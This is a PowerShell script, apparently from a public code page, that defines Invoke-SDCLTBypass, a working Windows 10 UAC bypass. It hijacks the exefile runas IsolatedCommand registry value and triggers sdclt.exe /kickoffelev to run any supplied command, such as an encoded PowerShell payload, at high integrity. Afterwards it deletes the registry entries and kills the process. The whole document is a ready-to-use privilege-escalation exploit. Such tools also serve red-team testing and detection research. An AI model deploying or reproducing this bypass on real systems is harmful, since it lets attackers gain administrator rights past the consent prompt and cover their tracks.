Permalink
| function Invoke-SDCLTBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC by hijacking the "IsolatedCommand" value in "shell\runas\command" | |
| Only tested on Windows 10 | |
| Author: Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| .PARAMETER Command | |
| Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc <encodedCommand>" | |
| Easiest test is "C:\Windows\System32\cmd.exe /c notepad.exe" | |
| .EXAMPLE | |
| Invoke-SDCLTBypass -Command "C:\Windows\System32\cmd.exe /c notepad.exe" | |
| This will start notepad.exe in high-integrity context. | |
| #> | |
| [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] | |
| Param ( | |
| [Parameter(Mandatory = $True)] | |
| [ValidateNotNullOrEmpty()] | |
| [String] | |
| $Command, | |
| [Switch] | |
| $Force | |
| ) | |
| $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin | |
| $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop | |
| if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){ | |
| "UAC is set to 'Always Notify'. This module does not bypass this setting." | |
| exit | |
| } | |
| else{ | |
| #Begin Execution | |
| $exeCommandPath = "HKCU:\Software\Classes\exefile\shell\runas\command" | |
| if ($Force -or ((Get-ItemProperty -Path $exeCommandPath -Name 'IsolatedCommand' -ErrorAction SilentlyContinue) -eq $null)){ | |
| New-Item $exeCommandPath -Force | | |
| New-ItemProperty -Name 'IsolatedCommand' -Value $Command -PropertyType string -Force | Out-Null | |
| }else{ | |
| Write-Warning "Key already exists, consider using -Force" | |
| exit | |
| } | |
| if (Test-Path $exeCommandPath) { | |
| Write-Verbose "Created registry entries to hijack the exe runas extension" | |
| }else{ | |
| Write-Warning "Failed to create registry key, exiting" | |
| exit | |
| } | |
| $sdcltPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'sdclt.exe' | |
| if ($PSCmdlet.ShouldProcess($sdcltPath, 'Start process')) { | |
| $Process = Start-Process -FilePath $sdcltPath -ArgumentList '/kickoffelev' -PassThru | |
| Write-Verbose "Started sdclt.exe" | |
| } | |
| #Sleep 5 seconds | |
| Write-Verbose "Sleeping 5 seconds to trigger payload" | |
| if (-not $PSBoundParameters['WhatIf']) { | |
| Start-Sleep -Seconds 5 | |
| } | |
| $exefilePath = "HKCU:\Software\Classes\exefile" | |
| if (Test-Path $exefilePath) { | |
| #Remove the registry entry | |
| Remove-Item $exefilePath -Recurse -Force | |
| Write-Verbose "Removed registry entries" | |
| } | |
| if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ | |
| Stop-Process -Id $Process.Id | |
| Write-Verbose "Killed running sdclt process" | |
| } | |
| } | |
| } |